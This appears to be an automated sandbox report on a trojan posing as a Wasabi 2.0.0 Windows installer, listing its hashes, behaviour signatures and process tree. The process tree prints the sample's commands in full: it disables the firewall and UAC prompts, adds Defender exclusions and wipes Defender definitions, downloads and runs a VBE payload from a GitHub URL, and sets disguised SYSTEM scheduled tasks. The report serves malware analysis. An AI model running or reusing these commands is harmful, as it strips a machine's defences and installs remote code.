Overview

overview

10

Static

static

Wasabi-2.0...64.exe

windows7-x64

10

Wasabi-2.0...64.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    66s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    11-01-2023 11:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Wasabi-2.0.0-windows-x64.exe

  • Size

    80.2MB

  • MD5

    d891a0dd3031ba640ad4ac38e637193d

  • SHA1

    aa8d36b8b0df86458c4c2c584209938bfd2a21ff

  • SHA256

    cabfd8d8f97582b86787a83a1dee4446d0f2e3ba4f346884c5cd6e242b61df78

  • SHA512

    cd4e2db41df7a843a5bc1fa8cb0ac9778ffe315311aa19a84c1e36e122af38ff6e61d3bbe26582f508c1ecfc36b5df2a2f988ed1450d4e7c10499c319c130a6d

  • SSDEEP

    1572864:fm9oNpXGKGC5kSQUwOy5NpYpnFzGl4vBzDKBbRUfJUNQxup00Hc1q8ACfH85Ckwq:e6ZG+Qoy5NoFilK9KJRxNQgv81/Apnwq

Score
10/10
evasiontrojan

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

    evasion
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    evasiontrojan
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Windows security modification 2 TTPs 3 IoCs
    evasiontrojan
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wasabi-2.0.0-windows-x64.exe
    "C:\Users\Admin\AppData\Local\Temp\Wasabi-2.0.0-windows-x64.exe"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\SysWOW64\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe" /elevate
        3⤵
        • Modifies Windows Defender notification settings
        • Windows security modification
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2008
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1860
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
          4⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1560
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
          4⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:760
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA ​​-Value 1
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
          4⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1744
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1420
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1352
          • C:\Program Files\Windows Defender\MpCmdRun.exe
            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
            5⤵
            • Deletes Windows Defender Definitions
            PID:1132
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Install-WindowsFeature NET-Framework-Core; DISM /Online /Enable-Feature /FeatureName:"NetFx3"; DISM /Online /Enable-Feature /FeatureName:NetFx3 /All; Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3";
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1616
          • C:\Windows\SysWOW64\Dism.exe
            "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
            5⤵
            • Drops file in Windows directory
            PID:2100
          • C:\Windows\SysWOW64\Dism.exe
            "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3 /All
            5⤵
            • Drops file in Windows directory
            PID:2220
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/BejaminGofer81/p/raw/main/post.vbe -OutFile C:\ProgramData\post.vbe; start C:\ProgramData\post.vbe;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\Microsoft\Google\src.bat" "
          4⤵
            PID:2500
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003Core" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC DAILY /ST 20:30 /F /RL HIGHEST
              5⤵
              • Creates scheduled task(s)
              PID:2560
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003UA" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC ONSTART /F /RL HIGHEST
              5⤵
              • Creates scheduled task(s)
              PID:2592
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
            4⤵
              PID:2524
              • C:\Windows\SysWOW64\netsh.exe
                netsh advfirewall set currentprofile state off
                5⤵
                • Modifies Windows Firewall
                PID:2576
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        1⤵
          PID:2284
        • C:\Windows\system32\AUDIODG.EXE
          C:\Windows\system32\AUDIODG.EXE 0x470
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2632
        • C:\Windows\system32\wermgr.exe
          "C:\Windows\system32\wermgr.exe" "-outproc" "1264" "3272"
          1⤵
            PID:2724

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\Microsoft\Google\src.bat
            Filesize

            775B

            MD5

            1a7f60c6657bb003216db72b4f550a26

            SHA1

            0fed1e332b2570a3ceed6d3d7482f31a91d95f0e

            SHA256

            9798ff8cd05e753d3dd68f78a2541ab6d5f62a6a2442e7c40218cfb4313fcd06

            SHA512

            2e1b529820262919784394861ac4df552a083336920432e3c5fff5b0b08cce1a105532c58cc4a392649e2482772bcf57cd0c6ceb69b7137293934ca7ae9e3a12

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe
            Filesize

            9KB

            MD5

            3cf9755443bb956bc8dbec8589692a53

            SHA1

            2b9551af484fbf7efea22ed41e264e2e03d253ff

            SHA256

            38399c8324cfc525569a77fa8152bc1aa74084213cfa9e38e205c9f96a13e67c

            SHA512

            cf156564be1e556b671f0b9f0bafb019c7b9450d8587636a3b3da3823b893c6c49b5a16310ee804fb201476ec7c3630ed22f7c89812cf2fecd792d5c7ba408d4

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            44d1b617d5a7478552aaf51b82d61b8c

            SHA1

            c2878f36169516910bbf355fd245fd749c8a3f4c

            SHA256

            cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283

            SHA512

            5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99

            Download Submit
          • C:\Windows\Logs\DISM\dism.log
            Filesize

            149KB

            MD5

            4eccb4207400a5427d99b3721a472b53

            SHA1

            286589ac2c03bdbef51ba3b692870a059d62f97d

            SHA256

            4811439283c253a5941ca84c11863b7f4a2a5f18dcb444ce3bc94228e5a83b73

            SHA512

            2f6b07d7728b1f3022d7a9ecb8baec9961af919e1cdf8db2f937fcb6a60e27f4bc975e1e883a72b7f37479c6198b42a81b7045512d425cf294077221da612bb7

            Download Submit
          • memory/760-97-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/760-111-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/760-72-0x0000000000000000-mapping.dmp
            Download
          • memory/820-73-0x0000000000000000-mapping.dmp
            Download
          • memory/820-99-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/820-112-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/920-67-0x0000000000000000-mapping.dmp
            Download
          • memory/1132-106-0x0000000000000000-mapping.dmp
            Download
          • memory/1352-82-0x0000000000000000-mapping.dmp
            Download
          • memory/1352-116-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1352-96-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1384-64-0x0000000000000000-mapping.dmp
            Download
          • memory/1420-80-0x0000000000000000-mapping.dmp
            Download
          • memory/1420-101-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1420-113-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1548-115-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1548-104-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1548-78-0x0000000000000000-mapping.dmp
            Download
          • memory/1560-108-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1560-71-0x0000000000000000-mapping.dmp
            Download
          • memory/1560-105-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1616-100-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1616-84-0x0000000000000000-mapping.dmp
            Download
          • memory/1616-119-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1744-107-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1744-98-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1744-76-0x0000000000000000-mapping.dmp
            Download
          • memory/1860-102-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1860-110-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/1860-70-0x0000000000000000-mapping.dmp
            Download
          • memory/2008-114-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/2008-69-0x0000000000000000-mapping.dmp
            Download
          • memory/2008-103-0x0000000073240000-0x00000000737EB000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/2024-54-0x0000000076391000-0x0000000076393000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2100-109-0x0000000000000000-mapping.dmp
            Download
          • memory/2220-117-0x0000000000000000-mapping.dmp
            Download
          • memory/2284-120-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2408-121-0x0000000000000000-mapping.dmp
            Download
          • memory/2408-124-0x0000000073A70000-0x000000007401B000-memory.dmp
            Filesize

            5.7MB

            Download
          • memory/2500-125-0x0000000000000000-mapping.dmp
            Download
          • memory/2524-126-0x0000000000000000-mapping.dmp
            Download
          • memory/2560-128-0x0000000000000000-mapping.dmp
            Download
          • memory/2576-129-0x0000000000000000-mapping.dmp
            Download
          • memory/2592-130-0x0000000000000000-mapping.dmp
            Download